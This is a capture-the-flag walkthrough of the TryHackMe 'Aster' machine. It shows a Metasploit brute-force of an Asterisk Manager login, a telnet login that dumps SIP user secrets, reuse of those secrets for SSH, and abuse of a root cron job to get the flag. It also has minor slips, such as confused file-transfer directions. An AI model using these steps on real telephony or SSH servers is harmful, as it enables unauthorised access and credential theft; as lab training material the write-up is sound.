TryHackMe Aster Writeup
This writeup helps you find the flags of the Aster box on TryHackMe. The box helps you learn more about de-compiling pyc files and provides a general understanding of the open-source telephony Asterisk platform.
TryHackMe Aster – Enumeration
The fist step is enumerating the services on the box. We use nmap to scan for open ports. The command can be seen below.
nmap -p- -sV -sC -Pn -vvv <HOST_IP>
The sV flag is used to figure out service/version info, the sC flag is used to run some default scripts and the Pn flag is used to skip host discovery. Furthermore, we add the p- flag in order to scan all 65536 ports. The results of the scan can be seen below:
PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 fe:e3:52:06:50:93:2e:3f:7a:aa:fc:69:dd:cd:14:a2 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDEs6oKJb5SNNUczex8j97pL/V93XRaRytbAH7iR9pN0HbCmc2bD/Rg4IUuDArz4USY1G5aN0r+C3fcBSlmLWaqk+uzbNZFriELMcJPKa7tP7zx7o4TVMQDepvvcZUy9Z8QoA+n4cJYOjlldkWGq/dmsPQqBHDmHowxMauJkZxh2QVR0WpDZxcjbS26O8aC62QvT5ct9wgzBzD/dVV/SC3VH7sQOPsEFj+PHGoHrFz7MntxtRyR9Ujf+Dzbk2wnUVGrc6NZt8MV3vfo5nXjBRPTaIX6XNTijQxoj0/0NJ3YwntmHOQXaPu4++fzjP9cf4+r8PNppeKNYwWLRxzjnAiZ | 256 9c:4d:fd:a4:4e:18:ca:e2:c0:01:84:8c:d2:7a:51:f2 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPROPGV3YntCB4YEBuSk7u8qF0H9WxI9nTGbCJahJP4gJNcEj4uwn24Ep1eSs0kHxjFdri6+QQlPUygwRvAQqTs= | 256 c5:93:a6:0c:01:8a:68:63:d7:84:16:dc:2c:0a:96:1d (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrB46mC2C71WGXfIc9TwwLWhC99D9M2IxUHbQCbH0vp 80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Aster CTF 1720/tcp open h323q931? syn-ack 2000/tcp open cisco-sccp? syn-ack 5038/tcp open asterisk syn-ack Asterisk Call Manager 5.0.2 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The most interesting ports are 80 and 5038. On port 80 an Apache web server is running. The service on port 5038 is called the Asterisk Manager. Asterisk is an open-source telephony service built for Linux and MacOS. It is used to automatically re-direct calls. You can find information more information about the Asterisk platform here. Now we start by checking the Apache web server.
TryHackMe Aster – Apache web server
By accessing http://HOST_IP/ in your browser you can see the following page.
Before we just recklessly download the file on the page, we inspect the link to check what kind of file we are able to download. It seems to be a pyc file. This is Python compiled bytecode of a source file. We can download this file in order to check the original Python code. This might reveal some interesting information. Download the file. We are unable to read the file right away. Therefore, we need to de-compile the pyc file. This can be done using uncompyle2. Follow the instructions on the Github page in order to install the de-compile tool.
Run uncompyle2 output.pyc to display the original Python code. The result of this command can be seen below.
import pyfiglet
o0OO00 = pyfiglet.figlet_format('Hello!!')
oO00oOo = '476f6f64206a6f622c2075736572202261646d696e2220746865206f70656e20736f75726365206672616d65776f726b20666f72206275696c64696e6720636f6d6d756e69636174696f6e732c20696e7374616c6c656420696e20746865207365727665722e'
OOOo0 = bytes.fromhex(oO00oOo)
Oooo000o = OOOo0.decode('ASCII')
if 0:
i1 * ii1IiI1i % OOooOOo / I11i / o0O / IiiIII111iI
Oo = '476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21'
I1Ii11I1Ii1i = bytes.fromhex(Oo)
Ooo = I1Ii11I1Ii1i.decode('ASCII')
if 0:
iii1I1I / O00oOoOoO0o0O.O0oo0OO0 + Oo0ooO0oo0oO.I1i1iI1i - II
print o0OO00
There appear to be some hidden hexadecimal values within the Python file. Decoding them using Cyberchef returns the following strings:
Good job, user "*****" the open source framework for building communications, installed in the server. Good job reverser, python is very cool!Good job reverser, python is very cool!Good job reverser, python is very cool!
TryHackMe Aster – Asterisk service
Please note that we changed the username to asterisk’s. Now that we have a username, we can try to brute-force the correct Asterisk Manager password for the found user. This, because the sentence provides us a hint that this username can be used for the open source framework for building communications. This seems like a reference to the Asterisk service. Luckily, metasploit provides a module which is able to brute-force Asterisk logins. Start metasploit by running msfconsole. The following snippet shows which options you have to provide in order for the module to succeed.
use auxiliary/voip/asterisk_login set RHOSTS <HOST_IP> set USERNAME admin run
The default password list is used. Whenever the password is not found using this list, we can always change the password list to rockyou.txt. After a few minutes we find a valid username and password combination! This is great now we can gain access to the Asterisk Manager.
In order to login to the server we use telnet to provide a connection to port 5038, the port Asterisk runs on. Run the following command in your terminal:
telnet <HOST_IP> 5038
Success! The following message is displayed in the terminal indicating we are logged in:
Asterisk Call Manager/5.0.2
At this point, I did not have a clue on how to login to the Asterisk Manager. I searched and found the following link. Here, you can find how to login to the Asterisk Manager. After running the telnet command you have to add the following commands in your console running telnet:
ACTION: LOGIN USERNAME: ***** SECRET: ****** EVENTS: ON
If successful we should see the following output:
Response: Success Message: Authentication accepted Event: FullyBooted Privilege: system,all Uptime: 10220 LastReload: 10220 Status: Fully Booted
TryHackMe Aster – Asterisk find users
Thus, we have signed into the server! We are now able to run commands. To view all commands we can run:
action:command command:help
An interesting command in this list is: sip show users. Run this command:
action:command command:sip show users
The output can be seen below:
Message: Command output follows Output: Username Secret Accountcode Def.Context ACL Forcerport Output: 100 100 test No No Output: 101 101 test No No Output: harry *********** test No No
This seems like a valid username and password combination. The list provides all the peers which are able to use the SIP proxy. This secret might be the password for the SSH server. Try to login to the ssh server with the harry user:
ssh harry@<HOST_IP&g; harry@ubuntu:~$
TryHackMe Aster – root flag
And we are in! The user flag can be found in the home directory of harry. Run cat /home/harry/user.txt to find the user flag. Now let’s find the root flag. Within the current directory you can find the Example_Root.jar file. The class can be extracted by running unzip Example_Root.jar. You need to transfer Example_Root.class to your local machine to inspect it with Ghidra. Run python3 -m http.server on the attacking machine. Now you can download the file on your local machine by running: wget http://<HOST_IP>:8000/Example_Root.class. Now you can open the file using Ghidra to find the source code of the Java file.
/* Flags:
ACC_PUBLIC
ACC_STATIC
public static void main(java.lang.String[]) */
void main_java.lang.String[]_void(String[] param1)
{
PrintStream objectRef;
boolean bVar1;
FileWriter objectRef_00;
File objectRef_01;
objectRef_01 = new File("/tmp/flag.dat");
bVar1 = Example_Root.isFileExists(objectRef_01);
if (bVar1 != false) {
objectRef_00 = new FileWriter("/home/harry/root.txt");
objectRef_00.write("my secret <3 baby");
objectRef_00.close();
objectRef = System.out;
objectRef.println("Successfully wrote to the file.");
}
return;
}
It seems like something is written to /home/harry/root.txt whenever /tmp/flag.dat exists. It might be that the contents of the root flag is written whenever this file exists. The only question is: when? It might be that a cronjob exists, which executes this script. When running: cat /etc/crontab we can see some cronjobs:
# m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly * * * * * root cd /opt/ && bash ufw.sh 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * * root cd /root/java/ && bash run.sh
Whilst you are not able to view the content of the run.sh file, it seems like some script is executed every minute. Because the script resides in /root/java/ this might indicate that the Java file is executed. Let’s create the /tmp/flag.dat file and wait one minute. Create the file by running echo "Hello World" > /tmp/flag.dat. After a minute we see that root.txt is created in the /home/harry directory. The content indeed shows us the root flag!
Despite not running a real privilege escalation, we still were able to find the root flag. This box learned me a lot about the Asterisk platform. I also learned that valuable information can be found when you de-compile binary files.
